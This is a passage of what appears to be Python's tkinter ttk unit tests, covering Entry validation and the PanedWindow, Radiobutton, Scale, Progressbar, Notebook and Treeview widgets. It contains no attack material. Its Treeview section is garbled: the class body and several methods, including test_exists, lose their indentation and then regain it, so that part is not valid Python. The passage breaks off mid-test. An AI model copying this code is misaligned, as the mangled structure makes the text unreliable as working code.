        self.assertEqual(self.entry.identify(-1, -1), "")
        self.assertRaises(tkinter.TclError, self.entry.identify, None, 5)
        self.assertRaises(tkinter.TclError, self.entry.identify, 5, None)
        self.assertRaises(tkinter.TclError, self.entry.identify, 5, '')

    def test_validation_options(self):
        """invalidcommand runs only when validatecommand returns False;
        a non-callable validatecommand raises TclError."""
        success = []
        test_invalid = lambda: success.append(True)
        self.entry['validate'] = 'none'
        self.entry['validatecommand'] = lambda: False
        self.entry['invalidcommand'] = test_invalid
        self.entry.validate()
        self.assertTrue(success)
        self.entry['invalidcommand'] = ''
        self.entry.validate()
        self.assertEqual(len(success), 1)
        self.entry['invalidcommand'] = test_invalid
        self.entry['validatecommand'] = lambda: True
        self.entry.validate()
        self.assertEqual(len(success), 1)
        self.entry['validatecommand'] = ''
        self.entry.validate()
        self.assertEqual(len(success), 1)
        self.entry['validatecommand'] = True
        self.assertRaises(tkinter.TclError, self.entry.validate)

    def test_validation(self):
        """Key validation (%S) rejects non-letter insertions."""
        validation = []
        def validate(to_insert):
            if not 'a' <= to_insert.lower() <= 'z':
                validation.append(False)
                return False
            validation.append(True)
            return True
        self.entry['validate'] = 'key'
        self.entry['validatecommand'] = self.entry.register(validate), '%S'
        self.entry.insert('end', 1)
        self.entry.insert('end', 'a')
        self.assertEqual(validation, [False, True])
        self.assertEqual(self.entry.get(), 'a')

    def test_revalidation(self):
        """validate() re-checks current content (%P) and sets/clears the
        'invalid' state flag accordingly."""
        def validate(content):
            for letter in content:
                if not 'a' <= letter.lower() <= 'z':
                    return False
            return True
        self.entry['validatecommand'] = self.entry.register(validate), '%P'
        self.entry.insert('end', 'avocado')
        self.assertEqual(self.entry.validate(), True)
        self.assertEqual(self.entry.state(), ())
        self.entry.delete(0, 'end')
        self.assertEqual(self.entry.get(), '')
        self.entry.insert('end', 'a1b')
        self.assertEqual(self.entry.validate(), False)
        self.assertEqual(self.entry.state(), ('invalid', ))
        self.entry.delete(1)
        self.assertEqual(self.entry.validate(), True)
        self.assertEqual(self.entry.state(), ())
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class PanedWindowTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.PanedWindow."""

    OPTIONS = (
        'class', 'cursor', 'height',
        'orient', 'style', 'takefocus', 'width',
    )

    def setUp(self):
        super().setUp()
        # A fresh paned window used by the tests below.
        self.paned = self.create()

    def create(self, **kwargs):
        """Return a ttk.PanedWindow created under the test root."""
        return ttk.PanedWindow(self.root, **kwargs)

    def test_orient(self):
        """'orient' is read-only after creation; it can only be chosen
        at construction time."""
        widget = self.create()
        self.assertEqual(str(widget['orient']), 'vertical')
        errmsg = 'attempt to change read-only option'
        if get_tk_patchlevel() < (8, 6, 0):  # actually this was changed in 8.6b3
            errmsg = 'Attempt to change read-only option'
        self.checkInvalidParam(widget, 'orient', 'horizontal',
                errmsg=errmsg)
        widget2 = self.create(orient='horizontal')
        self.assertEqual(str(widget2['orient']), 'horizontal')

    def test_add(self):
        """add() rejects non-direct children and duplicates."""
        # attempt to add a child that is not a direct child of the paned window
        label = ttk.Label(self.paned)
        child = ttk.Label(label)
        self.assertRaises(tkinter.TclError, self.paned.add, child)
        label.destroy()
        child.destroy()
        # another attempt
        label = ttk.Label(self.root)
        child = ttk.Label(label)
        self.assertRaises(tkinter.TclError, self.paned.add, child)
        child.destroy()
        label.destroy()
        good_child = ttk.Label(self.root)
        self.paned.add(good_child)
        # re-adding a child is not accepted
        self.assertRaises(tkinter.TclError, self.paned.add, good_child)
        other_child = ttk.Label(self.paned)
        self.paned.add(other_child)
        self.assertEqual(self.paned.pane(0), self.paned.pane(1))
        self.assertRaises(tkinter.TclError, self.paned.pane, 2)
        good_child.destroy()
        other_child.destroy()
        self.assertRaises(tkinter.TclError, self.paned.pane, 0)

    def test_forget(self):
        """forget() removes a pane; a forgotten index raises TclError."""
        self.assertRaises(tkinter.TclError, self.paned.forget, None)
        self.assertRaises(tkinter.TclError, self.paned.forget, 0)
        self.paned.add(ttk.Label(self.root))
        self.paned.forget(0)
        self.assertRaises(tkinter.TclError, self.paned.forget, 0)

    def test_insert(self):
        """insert() adds new panes and moves existing ones."""
        self.assertRaises(tkinter.TclError, self.paned.insert, None, 0)
        self.assertRaises(tkinter.TclError, self.paned.insert, 0, None)
        self.assertRaises(tkinter.TclError, self.paned.insert, 0, 0)
        child = ttk.Label(self.root)
        child2 = ttk.Label(self.root)
        child3 = ttk.Label(self.root)
        self.assertRaises(tkinter.TclError, self.paned.insert, 0, child)
        self.paned.insert('end', child2)
        self.paned.insert(0, child)
        self.assertEqual(self.paned.panes(), (str(child), str(child2)))
        self.paned.insert(0, child2)
        self.assertEqual(self.paned.panes(), (str(child2), str(child)))
        self.paned.insert('end', child3)
        self.assertEqual(self.paned.panes(),
            (str(child2), str(child), str(child3)))
        # reinserting a child should move it to its current position
        panes = self.paned.panes()
        self.paned.insert('end', child3)
        self.assertEqual(panes, self.paned.panes())
        # moving child3 to child2 position should result in child2 ending up
        # in previous child position and child ending up in previous child3
        # position
        self.paned.insert(child2, child3)
        self.assertEqual(self.paned.panes(),
            (str(child3), str(child2), str(child)))

    def test_pane(self):
        """pane() returns all options as a dict or one queried option."""
        self.assertRaises(tkinter.TclError, self.paned.pane, 0)
        child = ttk.Label(self.root)
        self.paned.add(child)
        self.assertIsInstance(self.paned.pane(0), dict)
        self.assertEqual(self.paned.pane(0, weight=None),
                         0 if self.wantobjects else '0')
        # newer form for querying a single option
        self.assertEqual(self.paned.pane(0, 'weight'),
                         0 if self.wantobjects else '0')
        self.assertEqual(self.paned.pane(0), self.paned.pane(str(child)))
        self.assertRaises(tkinter.TclError, self.paned.pane, 0,
                          badoption='somevalue')

    def test_sashpos(self):
        """sashpos() needs at least two panes and a mapped widget."""
        self.assertRaises(tkinter.TclError, self.paned.sashpos, None)
        self.assertRaises(tkinter.TclError, self.paned.sashpos, '')
        self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
        child = ttk.Label(self.paned, text='a')
        self.paned.add(child, weight=1)
        self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
        child2 = ttk.Label(self.paned, text='b')
        self.paned.add(child2)
        self.assertRaises(tkinter.TclError, self.paned.sashpos, 1)
        self.paned.pack(expand=True, fill='both')
        self.paned.wait_visibility()
        curr_pos = self.paned.sashpos(0)
        self.paned.sashpos(0, 1000)
        self.assertNotEqual(curr_pos, self.paned.sashpos(0))
        self.assertIsInstance(self.paned.sashpos(0), int)
@add_standard_options(StandardTtkOptionsTests)
class RadiobuttonTest(AbstractLabelTest, unittest.TestCase):
    """Tests for ttk.Radiobutton."""

    OPTIONS = (
        'class', 'command', 'compound', 'cursor',
        'image',
        'state', 'style',
        'takefocus', 'text', 'textvariable',
        'underline', 'value', 'variable', 'width',
    )

    def create(self, **kwargs):
        """Return a ttk.Radiobutton created under the test root."""
        return ttk.Radiobutton(self.root, **kwargs)

    def test_value(self):
        widget = self.create()
        self.checkParams(widget, 'value', 1, 2.3, '', 'any string')

    def test_invoke(self):
        """invoke() selects the button, sets the shared variable to the
        button's value and runs the command (if any)."""
        success = []
        def cb_test():
            success.append(1)
            return "cb test called"
        myvar = tkinter.IntVar(self.root)
        cbtn = ttk.Radiobutton(self.root, command=cb_test,
                               variable=myvar, value=0)
        cbtn2 = ttk.Radiobutton(self.root, command=cb_test,
                                variable=myvar, value=1)
        # Without wantobjects, Tcl returns strings — compare via int().
        if self.wantobjects:
            conv = lambda x: x
        else:
            conv = int
        res = cbtn.invoke()
        self.assertEqual(res, "cb test called")
        self.assertEqual(conv(cbtn['value']), myvar.get())
        self.assertEqual(myvar.get(),
            conv(cbtn.tk.globalgetvar(cbtn['variable'])))
        self.assertTrue(success)
        cbtn2['command'] = ''
        res = cbtn2.invoke()
        self.assertEqual(str(res), '')
        self.assertLessEqual(len(success), 1)
        self.assertEqual(conv(cbtn2['value']), myvar.get())
        self.assertEqual(myvar.get(),
            conv(cbtn.tk.globalgetvar(cbtn['variable'])))
        # both radiobuttons share the same variable
        self.assertEqual(str(cbtn['variable']), str(cbtn2['variable']))
class MenubuttonTest(AbstractLabelTest, unittest.TestCase):
    """Tests for ttk.Menubutton."""

    OPTIONS = (
        'class', 'compound', 'cursor', 'direction',
        'image', 'menu', 'state', 'style',
        'takefocus', 'text', 'textvariable',
        'underline', 'width',
    )

    def create(self, **kwargs):
        """Return a ttk.Menubutton created under the test root."""
        return ttk.Menubutton(self.root, **kwargs)

    def test_direction(self):
        widget = self.create()
        self.checkEnumParam(widget, 'direction',
                'above', 'below', 'left', 'right', 'flush')

    def test_menu(self):
        """'menu' stores the associated menu's path name."""
        widget = self.create()
        menu = tkinter.Menu(widget, name='menu')
        self.checkParam(widget, 'menu', menu, conv=str)
        menu.destroy()
@add_standard_options(StandardTtkOptionsTests)
class ScaleTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Scale."""

    OPTIONS = (
        'class', 'command', 'cursor', 'from', 'length',
        'orient', 'style', 'takefocus', 'to', 'value', 'variable',
    )
    # Pixel options are reported unconverted for ttk.Scale.
    _conv_pixels = noconv
    default_orient = 'horizontal'

    def setUp(self):
        super().setUp()
        # A packed, updated scale so geometry queries work in the tests.
        self.scale = self.create()
        self.scale.pack()
        self.scale.update()

    def create(self, **kwargs):
        """Return a ttk.Scale created under the test root."""
        return ttk.Scale(self.root, **kwargs)

    def test_from(self):
        widget = self.create()
        self.checkFloatParam(widget, 'from', 100, 14.9, 15.1, conv=False)

    def test_length(self):
        widget = self.create()
        self.checkPixelsParam(widget, 'length', 130, 131.2, 135.6, '5i')

    def test_to(self):
        widget = self.create()
        self.checkFloatParam(widget, 'to', 300, 14.9, 15.1, -10, conv=False)

    def test_value(self):
        widget = self.create()
        self.checkFloatParam(widget, 'value', 300, 14.9, 15.1, -10, conv=False)

    def test_custom_event(self):
        """Each change of 'from'/'to' fires one <<RangeChanged>> event."""
        failure = [1, 1, 1]  # will need to be empty
        # The binding id is not needed; bind and discard it.
        self.scale.bind('<<RangeChanged>>', lambda evt: failure.pop())
        self.scale['from'] = 10
        self.scale['from_'] = 10
        self.scale['to'] = 3
        self.assertFalse(failure)
        failure = [1, 1, 1]
        self.scale.configure(from_=2, to=5)
        self.scale.configure(from_=0, to=-2)
        self.scale.configure(to=10)
        self.assertFalse(failure)

    def test_get(self):
        """get(x, y) maps coordinates to scale values; get() returns the
        current value."""
        if self.wantobjects:
            conv = lambda x: x
        else:
            conv = float
        scale_width = self.scale.winfo_width()
        self.assertEqual(self.scale.get(scale_width, 0), self.scale['to'])
        self.assertEqual(conv(self.scale.get(0, 0)), conv(self.scale['from']))
        self.assertEqual(self.scale.get(), self.scale['value'])
        self.scale['value'] = 30
        self.assertEqual(self.scale.get(), self.scale['value'])
        self.assertRaises(tkinter.TclError, self.scale.get, '', 0)
        self.assertRaises(tkinter.TclError, self.scale.get, 0, '')

    def test_set(self):
        """set() clamps to the current from/to range; writing the linked
        variable or the 'value' option bypasses the clamping."""
        if self.wantobjects:
            conv = lambda x: x
        else:
            conv = float
        # set restricts the max/min values according to the current range.
        # (Locals renamed from 'max'/'min' to avoid shadowing builtins.)
        max_value = conv(self.scale['to'])
        new_max = max_value + 10
        self.scale.set(new_max)
        self.assertEqual(conv(self.scale.get()), max_value)
        min_value = conv(self.scale['from'])
        self.scale.set(min_value - 1)
        self.assertEqual(conv(self.scale.get()), min_value)
        # changing directly the variable doesn't impose this limitation tho
        var = tkinter.DoubleVar(self.root)
        self.scale['variable'] = var
        var.set(max_value + 5)
        self.assertEqual(conv(self.scale.get()), var.get())
        self.assertEqual(conv(self.scale.get()), max_value + 5)
        del var
        # the same happens with the value option
        self.scale['value'] = max_value + 10
        self.assertEqual(conv(self.scale.get()), max_value + 10)
        self.assertEqual(conv(self.scale.get()), conv(self.scale['value']))
        # nevertheless, note that the max/min values we can get specifying
        # x, y coords are the ones according to the current range
        self.assertEqual(conv(self.scale.get(0, 0)), min_value)
        self.assertEqual(conv(self.scale.get(self.scale.winfo_width(), 0)),
                         max_value)
        self.assertRaises(tkinter.TclError, self.scale.set, None)
@add_standard_options(StandardTtkOptionsTests)
class ProgressbarTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Progressbar."""

    OPTIONS = (
        'class', 'cursor', 'orient', 'length',
        'mode', 'maximum', 'phase',
        'style', 'takefocus', 'value', 'variable',
    )
    # Pixel options are reported unconverted for ttk.Progressbar.
    _conv_pixels = noconv
    default_orient = 'horizontal'

    def create(self, **kwargs):
        """Return a ttk.Progressbar created under the test root."""
        return ttk.Progressbar(self.root, **kwargs)

    def test_length(self):
        widget = self.create()
        self.checkPixelsParam(widget, 'length', 100.1, 56.7, '2i')

    def test_maximum(self):
        widget = self.create()
        self.checkFloatParam(widget, 'maximum', 150.2, 77.7, 0, -10, conv=False)

    def test_mode(self):
        widget = self.create()
        self.checkEnumParam(widget, 'mode', 'determinate', 'indeterminate')

    def test_phase(self):
        # XXX: read-only option with no documented testable behavior here.
        pass

    def test_value(self):
        widget = self.create()
        self.checkFloatParam(widget, 'value', 150.2, 77.7, 0, -10,
                             conv=False)
# Skipped on macOS because the native aqua theme maps ttk.Scrollbar onto
# a platform scrollbar with different option behavior.
@unittest.skipIf(sys.platform == 'darwin',
                 'ttk.Scrollbar is special on MacOSX')
@add_standard_options(StandardTtkOptionsTests)
class ScrollbarTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Scrollbar."""

    OPTIONS = (
        'class', 'command', 'cursor', 'orient', 'style', 'takefocus',
    )
    default_orient = 'vertical'

    def create(self, **kwargs):
        """Return a ttk.Scrollbar created under the test root."""
        return ttk.Scrollbar(self.root, **kwargs)
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class NotebookTest(AbstractWidgetTest, unittest.TestCase):
    """Tests for ttk.Notebook."""

    OPTIONS = (
        'class', 'cursor', 'height', 'padding', 'style', 'takefocus',
    )

    def setUp(self):
        super().setUp()
        # A notebook with two labeled tabs used by the tests below.
        self.nb = self.create(padding=0)
        self.child1 = ttk.Label(self.root)
        self.child2 = ttk.Label(self.root)
        self.nb.add(self.child1, text='a')
        self.nb.add(self.child2, text='b')

    def create(self, **kwargs):
        """Return a ttk.Notebook created under the test root."""
        return ttk.Notebook(self.root, **kwargs)

    def test_tab_identifiers(self):
        """Tabs are addressable by widget, 'current', and '@x,y' forms."""
        self.nb.forget(0)
        self.nb.hide(self.child2)
        self.assertRaises(tkinter.TclError, self.nb.tab, self.child1)
        self.assertEqual(self.nb.index('end'), 1)
        self.nb.add(self.child2)
        self.assertEqual(self.nb.index('end'), 1)
        self.nb.select(self.child2)
        self.assertTrue(self.nb.tab('current'))
        self.nb.add(self.child1, text='a')
        self.nb.pack()
        self.nb.wait_visibility()
        # Tab strips start further right under macOS aqua.
        if sys.platform == 'darwin':
            tb_idx = "@20,5"
        else:
            tb_idx = "@5,5"
        self.assertEqual(self.nb.tab(tb_idx), self.nb.tab('current'))
        for i in range(5, 100, 5):
            try:
                if self.nb.tab('@%d, 5' % i, text=None) == 'a':
                    break
            except tkinter.TclError:
                pass
        else:
            self.fail("Tab with text 'a' not found")

    def test_add_and_hidden(self):
        """add() on a hidden tab unhides it in its previous position."""
        self.assertRaises(tkinter.TclError, self.nb.hide, -1)
        self.assertRaises(tkinter.TclError, self.nb.hide, 'hi')
        self.assertRaises(tkinter.TclError, self.nb.hide, None)
        self.assertRaises(tkinter.TclError, self.nb.add, None)
        self.assertRaises(tkinter.TclError, self.nb.add, ttk.Label(self.root),
            unknown='option')
        tabs = self.nb.tabs()
        self.nb.hide(self.child1)
        self.nb.add(self.child1)
        self.assertEqual(self.nb.tabs(), tabs)
        child = ttk.Label(self.root)
        self.nb.add(child, text='c')
        tabs = self.nb.tabs()
        curr = self.nb.index('current')
        # verify that the tab gets readded at its previous position
        child2_index = self.nb.index(self.child2)
        self.nb.hide(self.child2)
        self.nb.add(self.child2)
        self.assertEqual(self.nb.tabs(), tabs)
        self.assertEqual(self.nb.index(self.child2), child2_index)
        self.assertEqual(str(self.child2), self.nb.tabs()[child2_index])
        # but the tab next to it (not hidden) is the one selected now
        self.assertEqual(self.nb.index('current'), curr + 1)

    def test_forget(self):
        """forget() removes the tab; re-adding appends at the end."""
        self.assertRaises(tkinter.TclError, self.nb.forget, -1)
        self.assertRaises(tkinter.TclError, self.nb.forget, 'hi')
        self.assertRaises(tkinter.TclError, self.nb.forget, None)
        tabs = self.nb.tabs()
        child1_index = self.nb.index(self.child1)
        self.nb.forget(self.child1)
        self.assertNotIn(str(self.child1), self.nb.tabs())
        self.assertEqual(len(tabs) - 1, len(self.nb.tabs()))
        self.nb.add(self.child1)
        self.assertEqual(self.nb.index(self.child1), 1)
        self.assertNotEqual(child1_index, self.nb.index(self.child1))

    def test_index(self):
        """index() accepts a tab widget or 'end' (tab count)."""
        self.assertRaises(tkinter.TclError, self.nb.index, -1)
        self.assertRaises(tkinter.TclError, self.nb.index, None)
        self.assertIsInstance(self.nb.index('end'), int)
        self.assertEqual(self.nb.index(self.child1), 0)
        self.assertEqual(self.nb.index(self.child2), 1)
        self.assertEqual(self.nb.index('end'), 2)

    def test_insert(self):
        """insert() moves existing tabs and adds new ones; out-of-range
        positions raise TclError."""
        # moving tabs
        tabs = self.nb.tabs()
        self.nb.insert(1, tabs[0])
        self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
        self.nb.insert(self.child1, self.child2)
        self.assertEqual(self.nb.tabs(), tabs)
        self.nb.insert('end', self.child1)
        self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
        self.nb.insert('end', 0)
        self.assertEqual(self.nb.tabs(), tabs)
        # bad moves
        self.assertRaises(tkinter.TclError, self.nb.insert, 2, tabs[0])
        self.assertRaises(tkinter.TclError, self.nb.insert, -1, tabs[0])
        # new tab
        child3 = ttk.Label(self.root)
        self.nb.insert(1, child3)
        self.assertEqual(self.nb.tabs(), (tabs[0], str(child3), tabs[1]))
        self.nb.forget(child3)
        self.assertEqual(self.nb.tabs(), tabs)
        self.nb.insert(self.child1, child3)
        self.assertEqual(self.nb.tabs(), (str(child3), ) + tabs)
        self.nb.forget(child3)
        self.assertRaises(tkinter.TclError, self.nb.insert, 2, child3)
        self.assertRaises(tkinter.TclError, self.nb.insert, -1, child3)
        # bad inserts
        self.assertRaises(tkinter.TclError, self.nb.insert, 'end', None)
        self.assertRaises(tkinter.TclError, self.nb.insert, None, 0)
        self.assertRaises(tkinter.TclError, self.nb.insert, None, None)

    def test_select(self):
        """select() switches tabs, unmaps the old one and fires
        <<NotebookTabChanged>>."""
        self.nb.pack()
        self.nb.wait_visibility()
        success = []
        tab_changed = []
        self.child1.bind('<Unmap>', lambda evt: success.append(True))
        self.nb.bind('<<NotebookTabChanged>>',
            lambda evt: tab_changed.append(True))
        self.assertEqual(self.nb.select(), str(self.child1))
        self.nb.select(self.child2)
        self.assertTrue(success)
        self.assertEqual(self.nb.select(), str(self.child2))
        self.nb.update()
        self.assertTrue(tab_changed)

    def test_tab(self):
        """tab() returns a dict of options or a single queried option."""
        self.assertRaises(tkinter.TclError, self.nb.tab, -1)
        self.assertRaises(tkinter.TclError, self.nb.tab, 'notab')
        self.assertRaises(tkinter.TclError, self.nb.tab, None)
        self.assertIsInstance(self.nb.tab(self.child1), dict)
        self.assertEqual(self.nb.tab(self.child1, text=None), 'a')
        # newer form for querying a single option
        self.assertEqual(self.nb.tab(self.child1, 'text'), 'a')
        self.nb.tab(self.child1, text='abc')
        self.assertEqual(self.nb.tab(self.child1, text=None), 'abc')
        self.assertEqual(self.nb.tab(self.child1, 'text'), 'abc')

    def test_tabs(self):
        self.assertEqual(len(self.nb.tabs()), 2)
        self.nb.forget(self.child1)
        self.nb.forget(self.child2)
        self.assertEqual(self.nb.tabs(), ())

    def test_traversal(self):
        """Control-Tab cycles tabs; after enable_traversal(), Alt/Option
        plus the underlined letter selects the matching tab."""
        self.nb.pack()
        self.nb.wait_visibility()
        self.nb.select(0)
        simulate_mouse_click(self.nb, 5, 5)
        self.nb.focus_force()
        self.nb.event_generate('<Control-Tab>')
        self.assertEqual(self.nb.select(), str(self.child2))
        self.nb.focus_force()
        self.nb.event_generate('<Shift-Control-Tab>')
        self.assertEqual(self.nb.select(), str(self.child1))
        self.nb.focus_force()
        self.nb.event_generate('<Shift-Control-Tab>')
        self.assertEqual(self.nb.select(), str(self.child2))
        self.nb.tab(self.child1, text='a', underline=0)
        self.nb.enable_traversal()
        self.nb.focus_force()
        simulate_mouse_click(self.nb, 5, 5)
        # macOS uses Option as the mnemonic modifier instead of Alt.
        if sys.platform == 'darwin':
            self.nb.event_generate('<Option-a>')
        else:
            self.nb.event_generate('<Alt-a>')
        self.assertEqual(self.nb.select(), str(self.child1))
@add_standard_options(StandardTtkOptionsTests)
class TreeviewTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'columns', 'cursor', 'displaycolumns',
'height', 'padding', 'selectmode', 'show',
'style', 'takefocus', 'xscrollcommand', 'yscrollcommand',
)
def setUp(self):
    """Create a fresh Treeview (self.tv) for each test."""
    super().setUp()
    self.tv = self.create(padding=0)
def create(self, **kwargs):
    """Return a ttk.Treeview created under the test root."""
    return ttk.Treeview(self.root, **kwargs)
def test_columns(self):
    """'columns' accepts a space-separated string, a tuple, or ()."""
    widget = self.create()
    self.checkParam(widget, 'columns', 'a b c',
                    expected=('a', 'b', 'c'))
    self.checkParam(widget, 'columns', ('a', 'b', 'c'))
    self.checkParam(widget, 'columns', ())
def test_displaycolumns(self):
    """'displaycolumns' takes names, indices, or '#all'; unknown names
    and out-of-bounds indices raise TclError."""
    widget = self.create()
    widget['columns'] = ('a', 'b', 'c')
    self.checkParam(widget, 'displaycolumns', 'b a c',
                    expected=('b', 'a', 'c'))
    self.checkParam(widget, 'displaycolumns', ('b', 'a', 'c'))
    self.checkParam(widget, 'displaycolumns', '#all',
                    expected=('#all',))
    self.checkParam(widget, 'displaycolumns', (2, 1, 0))
    self.checkInvalidParam(widget, 'displaycolumns', ('a', 'b', 'd'),
                           errmsg='Invalid column index d')
    self.checkInvalidParam(widget, 'displaycolumns', (1, 2, 3),
                           errmsg='Column index 3 out of bounds')
    self.checkInvalidParam(widget, 'displaycolumns', (1, -2),
                           errmsg='Column index -2 out of bounds')
def test_height(self):
    widget = self.create()
    self.checkPixelsParam(widget, 'height', 100, -100, 0, '3c', conv=False)
    self.checkPixelsParam(widget, 'height', 101.2, 102.6, conv=noconv)
def test_selectmode(self):
    widget = self.create()
    self.checkEnumParam(widget, 'selectmode',
                        'none', 'browse', 'extended')
def test_show(self):
    """'show' selects which elements appear: tree column, headings."""
    widget = self.create()
    self.checkParam(widget, 'show', 'tree headings',
                    expected=('tree', 'headings'))
    self.checkParam(widget, 'show', ('tree', 'headings'))
    self.checkParam(widget, 'show', ('headings', 'tree'))
    self.checkParam(widget, 'show', 'tree', expected=('tree',))
    self.checkParam(widget, 'show', 'headings', expected=('headings',))
def test_bbox(self):
    """bbox() returns a box for visible items and '' otherwise."""
    self.tv.pack()
    self.assertEqual(self.tv.bbox(''), '')
    self.tv.wait_visibility()
    self.tv.update()
    item_id = self.tv.insert('', 'end')
    children = self.tv.get_children()
    self.assertTrue(children)
    bbox = self.tv.bbox(children[0])
    self.assertIsBoundingBox(bbox)
    # compare width in bboxes
    self.tv['columns'] = ['test']
    self.tv.column('test', width=50)
    bbox_column0 = self.tv.bbox(children[0], 0)
    root_width = self.tv.column('#0', width=None)
    if not self.wantobjects:
        root_width = int(root_width)
    # column 0 starts right after the tree column (#0)
    self.assertEqual(bbox_column0[0], bbox[0] + root_width)
    # verify that bbox of a closed item is the empty string
    child1 = self.tv.insert(item_id, 'end')
    self.assertEqual(self.tv.bbox(child1), '')
def test_children(self):
    """get_children()/set_children() manage an item's child list;
    creating a parent/child cycle raises TclError."""
    # no children yet, should get an empty tuple
    self.assertEqual(self.tv.get_children(), ())
    item_id = self.tv.insert('', 'end')
    self.assertIsInstance(self.tv.get_children(), tuple)
    self.assertEqual(self.tv.get_children()[0], item_id)
    # add item_id and child3 as children of child2
    child2 = self.tv.insert('', 'end')
    child3 = self.tv.insert('', 'end')
    self.tv.set_children(child2, item_id, child3)
    self.assertEqual(self.tv.get_children(child2), (item_id, child3))
    # child3 has child2 as parent, thus trying to set child2 as a children
    # of child3 should result in an error
    self.assertRaises(tkinter.TclError,
                      self.tv.set_children, child3, child2)
    # remove child2 children
    self.tv.set_children(child2)
    self.assertEqual(self.tv.get_children(child2), ())
    # remove root's children
    self.tv.set_children('')
    self.assertEqual(self.tv.get_children(), ())
def test_column(self):
    """column() queries/configures column options; 'id' is read-only
    and invalid option values raise TclError."""
    # return a dict with all options/values
    self.assertIsInstance(self.tv.column('#0'), dict)
    # return a single value of the given option
    if self.wantobjects:
        self.assertIsInstance(self.tv.column('#0', width=None), int)
    # set a new value for an option
    self.tv.column('#0', width=10)
    # testing new way to get option value
    self.assertEqual(self.tv.column('#0', 'width'),
                     10 if self.wantobjects else '10')
    self.assertEqual(self.tv.column('#0', width=None),
                     10 if self.wantobjects else '10')
    # check read-only option
    self.assertRaises(tkinter.TclError, self.tv.column, '#0', id='X')
    self.assertRaises(tkinter.TclError, self.tv.column, 'invalid')
    invalid_kws = [
        {'unknown_option': 'some value'}, {'stretch': 'wrong'},
        {'anchor': 'wrong'}, {'width': 'wrong'}, {'minwidth': 'wrong'}
    ]
    for kw in invalid_kws:
        self.assertRaises(tkinter.TclError, self.tv.column, '#0',
                          **kw)
def test_delete(self):
    """delete() removes items (and their subtrees); deleted items
    cannot be reattached."""
    self.assertRaises(tkinter.TclError, self.tv.delete, '#0')
    item_id = self.tv.insert('', 'end')
    item2 = self.tv.insert(item_id, 'end')
    self.assertEqual(self.tv.get_children(), (item_id, ))
    self.assertEqual(self.tv.get_children(item_id), (item2, ))
    self.tv.delete(item_id)
    self.assertFalse(self.tv.get_children())
    # reattach should fail
    self.assertRaises(tkinter.TclError,
                      self.tv.reattach, item_id, '', 'end')
    # test multiple item delete
    item1 = self.tv.insert('', 'end')
    item2 = self.tv.insert('', 'end')
    self.assertEqual(self.tv.get_children(), (item1, item2))
    self.tv.delete(item1, item2)
    self.assertFalse(self.tv.get_children())
    def test_detach_reattach(self):
        """detach() hides items (keeping their subtree) and reattach()/move()
        restore or relocate them; bad arguments raise TclError."""
        item_id = self.tv.insert('', 'end')
        item2 = self.tv.insert(item_id, 'end')
        # calling detach without items is valid, although it does nothing
        prev = self.tv.get_children()
        self.tv.detach() # this should do nothing
        self.assertEqual(prev, self.tv.get_children())
        self.assertEqual(self.tv.get_children(), (item_id, ))
        self.assertEqual(self.tv.get_children(item_id), (item2, ))
        # detach item with children
        self.tv.detach(item_id)
        self.assertFalse(self.tv.get_children())
        # reattach item with children
        self.tv.reattach(item_id, '', 'end')
        self.assertEqual(self.tv.get_children(), (item_id, ))
        self.assertEqual(self.tv.get_children(item_id), (item2, ))
        # move a child to the root
        self.tv.move(item2, '', 'end')
        self.assertEqual(self.tv.get_children(), (item_id, item2))
        self.assertEqual(self.tv.get_children(item_id), ())
        # bad values
        self.assertRaises(tkinter.TclError,
            self.tv.reattach, 'nonexistent', '', 'end')
        self.assertRaises(tkinter.TclError,
            self.tv.detach, 'nonexistent')
        self.assertRaises(tkinter.TclError,
            self.tv.reattach, item2, 'otherparent', 'end')
        self.assertRaises(tkinter.TclError,
            self.tv.reattach, item2, '', 'invalid')
        # multiple detach
        self.tv.detach(item_id, item2)
        self.assertEqual(self.tv.get_children(), ())
        self.assertEqual(self.tv.get_children(item_id), ())
def test_exists(self):
self.assertEqual(self.tv.exists('something'), False)
self.assertEqual(self.tv.exists(''), True)
self.assertEqual(self.tv.exists({}), False)
# the following will make a tk.call equivalent to
# tk.call(treeview, "exists") which should result in an error
# in the tcl interpreter since tk requires an item.
self.assertRaises(tkinter.TclError, self.tv.exists, None)
    def test_focus(self):
        """focus() gets/sets the focused item; deleting the focused item
        clears the focus, and focusing an unknown item raises TclError."""
        # nothing is focused right now
        self.assertEqual(self.tv.focus(), '')
        item1 = self.tv.insert('', 'end')
        self.tv.focus(item1)
        self.assertEqual(self.tv.focus(), item1)
        self.tv.delete(item1)
        self.assertEqual(self.tv.focus(), '')
        # try focusing inexistent item
        self.assertRaises(tkinter.TclError, self.tv.focus, 'hi')
    def test_heading(self):
        """heading() queries all options as a dict, gets/sets single options,
        and rejects unknown options and invalid values."""
        # check a dict is returned
        self.assertIsInstance(self.tv.heading('#0'), dict)
        # check a value is returned
        self.tv.heading('#0', text='hi')
        self.assertEqual(self.tv.heading('#0', 'text'), 'hi')
        self.assertEqual(self.tv.heading('#0', text=None), 'hi')
        # invalid option
        self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
                          background=None)
        # invalid value
        self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
                          anchor=1)
    def test_heading_callback(self):
        """Clicking a heading invokes its configured command, and re-setting
        the command to its current name does not register a new tcl command."""
        def simulate_heading_click(x, y):
            simulate_mouse_click(self.tv, x, y)
            self.tv.update()
        success = [] # no success for now
        self.tv.pack()
        self.tv.wait_visibility()
        self.tv.heading('#0', command=lambda: success.append(True))
        self.tv.column('#0', width=100)
        self.tv.update()
        # assuming that the coords (5, 5) fall into heading #0
        simulate_heading_click(5, 5)
        if not success:
            self.fail("The command associated to the treeview heading wasn't "
                "invoked.")
        success = []
        # re-setting the command by its current tcl name must keep the
        # registered tcl command list unchanged (no leak / re-registration)
        commands = self.tv.master._tclCommands
        self.tv.heading('#0', command=str(self.tv.heading('#0', command=None)))
        self.assertEqual(commands, self.tv.master._tclCommands)
        simulate_heading_click(5, 5)
        if not success:
